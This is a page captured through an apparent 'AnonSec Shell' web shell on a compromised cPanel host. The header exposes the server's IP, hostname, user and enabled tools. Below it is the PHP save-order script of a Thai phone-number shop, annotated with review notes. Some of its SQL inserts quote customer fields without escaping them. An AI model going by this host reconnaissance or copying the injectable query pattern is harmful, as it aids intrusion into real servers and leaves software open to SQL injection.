AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/cart/


Current File : /home2/cp648411/public_html/simded.com/cart/cart_saveorder_ber.php
<?php 
include('../include/class.php');
include('../include/sql_injection_get.php');
include("../include/mail.php");
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
/*echo '<pre>';
print_r($_SESSION);
echo '</pre>';*/
?>

<?php
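// Save-order step 1: allocate the order id, resolve the shipping-method and
// province rows, and compute the order total from the cart held in the session.

// The cart ids, the shipping id and the province id are interpolated straight
// into WHERE fragments below, so anything that could break out of the quoted
// literal is rejected before any query runs and before an order id is consumed.
// NOTE(review): the allow-list assumes keys are plain alphanumeric tokens;
// tighten it to digits only if these columns are integer keys, and prefer bound
// parameters if the $view_db helper supports them (not visible in this file).
$cart_items = (isset($_SESSION["cart"]) && is_array($_SESSION["cart"])) ? $_SESSION["cart"] : array();
if (count($cart_items) === 0) {
	// Nothing to order: do not create an empty order row or send mail for it.
	exit('Invalid order data');
}
$lookup_keys = array_values($cart_items);
$lookup_keys[] = isset($_SESSION["shipping"]) ? $_SESSION["shipping"] : '';
$lookup_keys[] = isset($_SESSION['province']) ? $_SESSION['province'] : '';
foreach ($lookup_keys as $lookup_key) {
	if (!is_scalar($lookup_key) || !preg_match('/\A[A-Za-z0-9_-]*\z/', (string) $lookup_key)) {
		exit('Invalid order data');
	}
}

// presumably reserves the next value of the 'orders_runid' counter; confirm in class.php
$id = $runid_class->run_id('orders_runid');
// Phone number with the dashes removed, as stored on the order row.
$phone2 = str_replace('-', '', $_SESSION["phone"]);

// Shipping method chosen at checkout.
$list_sip = array('table'=>'ems_type','where'=>'id = "'.$_SESSION["shipping"].'"','order'=> "ORDER BY id DESC");				  
$view_sip = $view_db->view($list_sip);
$row_sip = $view_db->q($view_sip);

// Province chosen at checkout.
$list_ji = array('table'=>'province','where'=>'id = "'.$_SESSION['province'].'"','order'=> "ORDER BY id DESC");				  
$view_ji = $view_db->view($list_ji);
$row_ji = $view_db->q($view_ji);

// Start from zero explicitly; the original accumulated into an undefined variable.
$total = 0;
foreach ($_SESSION["cart"] as $key => $value)
{	
	// Prices are re-read from the phonenumber table rather than taken from the session.
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	$total =  $total + $row['price'];
}
// NOTE(review): the stored total adds the province row's price, while the
// confirmation e-mail built later adds the shipping method's price; confirm
// which of the two is intended.
$total = $total+$row_ji["price"];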

// Insert the order header row. The map handed to add_db() carries the table
// name plus one SQL literal per column, so each value is wrapped in single
// quotes here; a missing value becomes an empty literal.
// NOTE(review): the customer fields are quoted but not escaped in this block.
// Unless add_db() escapes them (its code is not visible here), a quote
// character in any of them alters the statement; confirm, and prefer bound
// parameters.
$sql_quote = function ($raw) {
	return "'" . $raw . "'";
};

$list = [
	'table'       => 'orders',
	'id'          => $sql_quote($id ?? ''),
	'id_mem'      => $sql_quote($_SESSION['simDed_id'] ?? ''),
	'name'        => $sql_quote($_SESSION["name"] ?? ''),
	'lastname'    => $sql_quote($_SESSION["lastname"] ?? ''),
	'phone'       => $sql_quote($phone2 ?? ''),
	'email'       => $sql_quote($_SESSION["email"] ?? ''),
	'address'     => $sql_quote($_SESSION["address"] ?? ''),
	'province'    => $sql_quote($row_ji["name"] ?? ''),
	'delivery'    => $sql_quote($row_sip["name"] ?? ''),
	'delivery_id' => $sql_quote($row_sip["id"] ?? ''),
	'delivery_p'  => $sql_quote($row_sip["price"] ?? ''),
	'total'       => $sql_quote($total ?? ''),
	'zipcode'     => $sql_quote($_SESSION["zip"] ?? ''),
	'status'      => '1',
	'createdate'  => $sql_quote($date),
	'up_date'     => $sql_quote($date),
];
$add1 = $actiondata_db->add_db($list);

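// Write one order_detail row per cart item and flag each phone number as taken.
// NOTE(review): the status is set to '2' without checking its current value, so
// two sessions holding the same number in their carts could both complete;
// confirm whether edit_db() can make the update conditional.
foreach ($_SESSION["cart"] as $key => $value)
{
	// $value is interpolated into the WHERE fragment and into the insert below.
	// Skip anything that is not a plain key token so it cannot break out of the
	// quoted literal. NOTE(review): tighten to digits if ids are integer keys.
	if (!is_scalar($value) || !preg_match('/\A[A-Za-z0-9_-]*\z/', (string) $value)) {
		continue;
	}

	// Shop and price are re-read from the database, not trusted from the session.
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	
	$list = array(	
				'table'=>'order_detail',
				'id_order'=>"'".@$id."'",
				'id_pho'=>"'".@$value."'",
				'id_shop'=>"'".@$row["id_shop"]."'",
				'price'=>"'".@$row["price"]."'",
	);
	$add = $actiondata_db->add_db($list);
	
	// presumably status 2 marks the number as sold or reserved; confirm against the schema
	$list2 = array(	
			'table'=>'phonenumber',
			'id'=>$value,
			'status'=>'2',
			'up_date'=>$date
	);			  
	$add2 = $actiondata_db->edit_db($list2);
}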

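// Build the item rows of the confirmation e-mail, re-sum the item prices and
// collect the ids of the shops that appear in the order.
$total = 0;
$tb_order = '';
// Defined up front so the de-duplication that follows never receives an
// undefined variable when no item is processed.
$arr_shopid = array();
foreach ($_SESSION["cart"] as $key => $value)
{
	// $value is interpolated into the WHERE fragment below; skip anything that
	// is not a plain key token so it cannot break out of the quoted literal.
	// NOTE(review): tighten to digits if ids are integer keys.
	if (!is_scalar($value) || !preg_match('/\A[A-Za-z0-9_-]*\z/', (string) $value)) {
		continue;
	}
	
	$list = array('table'=>'phonenumber','where'=>'id = "'.$value.'"','order'=> "ORDER BY id DESC");				  
	$view = $view_db->view($list);
	$row = $view_db->q($view);
	
	// NOTE(review): the formatter's output is placed in the e-mail as-is; whether
	// it returns plain text or markup cannot be seen from this file.
	$phonenumber = $Phone_class->format_phonenumber($row['phonenumber'],$row['format']);
	
	// presumably returns the 'image' column of the matching network row; it is used as a file name below
	$row_mobilenetwork = $actiondata_db->q_one('mobilenetwork','id = "'.$row['mobilenetwork'].'"','image');
	
	$list_shr = array('table'=>'shop','where'=>'id = "'.$row['id_shop'].'" ');				  
	$view_shr = $view_db->view($list_shr);
	$row_shr = $view_db->q($view_shr);
	
	// NOTE(review): shop name, shop code and image name are database values
	// written into HTML without escaping; confirm they are stored as plain text
	// and escape them with htmlspecialchars() if shop owners can edit them.
	$tb_order .= '
	<tr>
		<td><div><a href="'. $upload .$row_shr['codeshop'] .'">'.$row_shr['nameShop'].' </a></div></td>
		<td><div>'.$phonenumber.' </div></td>
		<td><div><img src="'. $upload.'/mobilenetwork/'.$row_mobilenetwork.'" width="50"></div></td>
		<td><div>'. number_format($row['price']) .'</div></td>
	</tr>';
	$total =  $total + $row['price'];

	$arr_shopid[] =  $row_shr['id'];
}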

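// For each distinct shop in the order, prepend its contact block to the e-mail
// footer and its address to the comma-separated shop recipient list.
// The three accumulators are given defaults first so an order with no
// processed items does not read undefined variables.
$arr_shopid = (isset($arr_shopid) && is_array($arr_shopid)) ? array_unique($arr_shopid) : array();
$shopdetail = isset($shopdetail) ? $shopdetail : '';
$email_shop = isset($email_shop) ? $email_shop : '';
foreach ($arr_shopid as $key => $value)
{
	$list_shr = array('table'=>'shop','where'=>'id = "'.$value.'" ');				  
	$view_shr = $view_db->view($list_shr);
	$row_shr = $view_db->q($view_shr);
	// NOTE(review): these shop fields are database values written into HTML
	// without escaping; confirm they are stored as plain text and escape them
	// with htmlspecialchars() if shop owners can edit them.
	$shopdetail = $row_shr['nameShop'] .'<br>'. $row_shr['addressshop'] .'<br>'.$row_shr['email'] .'<br>'.$row_shr['phone'].'<br>'. $shopdetail ;
	
	$email_shop = $row_shr['email'].','.$email_shop; 
}
// Drop the trailing comma left by the loop. substr() is skipped for an empty
// list because its result on an empty string differs between PHP versions.
$email_shop = $rest = ($email_shop === '') ? '' : substr($email_shop, 0, -1);
$shopdetail = 'ข้อมูลทางร้าน <br><br>'.$shopdetail;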



// Shipping fee of the chosen method and the grand total shown in the e-mail.
$sip = $row_sip['price'];
$sumtotal = $total + $sip;

// Three-row summary table: item subtotal, shipping method with its fee, and
// the grand total. The literal fragments are joined unchanged.
$tb_order2 = implode('', array(
	'
<table width="100%" border="0">
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#000;font-size:20px;">
    <td> ราคารวม &nbsp;&nbsp;&nbsp;&nbsp; </td>
    <td>',
	number_format($total),
	'  บาท</td>
  </tr>
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#66be89;font-size:20px;">
    <td>  ',
	$row_sip['name'],
	' &nbsp;&nbsp;&nbsp;&nbsp;</td>
    <td>',
	number_format($sip),
	'  บาท</td>
  </tr>
  <tr style="border-bottom:1px solid #f4eedc;padding-bottom:10px;color:#F00;font-size:20px;">
    <td> ราคารวม  &nbsp;&nbsp;&nbsp;&nbsp;</td>
    <td>',
	number_format($sumtotal),
	' บาท </td>
  </tr>
</table>
',
));
?>

<?php

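// Compose the HTML confirmation e-mail and send it to the customer, the shops
// in the order and a fixed address.

// The customer's checkout fields are escaped before they are placed in the
// HTML body, so markup typed into the form is shown as text to the shop and
// the fixed recipient. The last argument disables double encoding in case the
// values were already entity-encoded earlier.
$esc = function ($text) {
	return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
};

$body = 
				'<table width="100%" border="0" cellpadding="10" style="font-size:18px;">
					<tr>
						<td><img src="../images/Logo.png" width="200"></td>
						<td>'.$util_class->day_m_th($date).'</td>
					</tr>
					<tr>
						<td colspan="2">เรียนผู้ใช้บริการ</td>
					</tr>
					<tr>
						<td colspan="2">คุณ '.$esc($_SESSION["name"]). ' '.$esc($_SESSION["lastname"]).' <br>
							'.$esc($_SESSION["address"]).' <br>
							จ. '.$row_ji["name"].' '.$esc($_SESSION["zip"]).'    <br>
							โทร. '.$esc($_SESSION["phone"]).' <br>
							Email : '.$esc($_SESSION["email"]).'<br>
						</td>
					</tr>
				</table>
				<br><br>
				<table  width="100%" border="1" cellpadding="10"  style="font-size:18px;border:1px solid #666 "> 
                <thead>
                  <tr>
                    <th>ร้านค้า</th>
                    <th width="25%">เบอร์ที่สั่งซื้อ</th>
                    <th width="20%">เครือข่าย</th>
                    <th width="25%">ราคา/บาท</th>
                  </tr>
                </thead>
                <tbody>
				'.$tb_order.'
                </tbody>
              </table>
			  '.$tb_order2.
			  '<br>'.
			  'รอทางร้านดำเนินการ 24-48ชั่วโมง'.'<br><br>'.
			   $shopdetail.
			  '<br><br>'.$contact;

$mail->SetFrom($from, $from);
$mail->AddReplyTo($from, $from);
$mail->MsgHTML($body);
$txt = $txtname. ' :: ยืนยันการสั่งซื่อ ';
$mail->Subject = $txt;
$mail->AddAddress($_SESSION["email"]); // recipient: the customer
// The shop list arrives as one comma-joined string. Each address is added on
// its own, because a mailer that validates one address per call would reject
// the joined string when the order spans several shops.
// NOTE(review): the method names look like PHPMailer's; confirm in mail.php.
foreach (explode(',', (string) $email_shop) as $shop_address) {
	$shop_address = trim($shop_address);
	if ($shop_address !== '') {
		$mail->AddAddress($shop_address); // recipient: a shop in the order
	}
}
$mail->AddAddress("[email protected]", "onnud"); // second fixed recipient (address appears obfuscated in this capture)
				
if(!$mail->Send()) 
{
	// NOTE(review): the order rows were already inserted above and the cart is
	// still in the session when this exits, so a reload would presumably repeat
	// the inserts; confirm how cart_true.php and the caller handle 'er'.
	$_SESSION['er'] = 'false';
	// The mailer's error text can include the recipient address, which comes
	// from the session, so it is escaped before being echoed into the page.
	echo "<br> Mailer Error: " . $esc($mail->ErrorInfo);
	exit();
}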

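	// Clear the checkout data from the session once the order is saved and mailed.
	// "lastname" is the key the order insert and the e-mail read; the original
	// cleared only the misspelled "lestname", leaving the surname in the session.
	// The misspelled key is still cleared in case anything else wrote it.
	unset(
		$_SESSION["cart"],
		$_SESSION["num_cart"],
		$_SESSION["phone"],
		$_SESSION["shipping"],
		$_SESSION["province"],
		$_SESSION["name"],
		$_SESSION["lastname"],
		$_SESSION["lestname"],
		$_SESSION["email"],
		$_SESSION["address"],
		$_SESSION["zip"]
	);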



?>
<?php
// Left-pad the order id with zeros to five characters, then redirect the
// browser to the confirmation page with that value in the query string.
$or_id = str_pad($id, 5, '0', STR_PAD_LEFT);
?>
<meta http-equiv="refresh" content="0;URL=cart_true.php?order=<?= $or_id ?>" />  
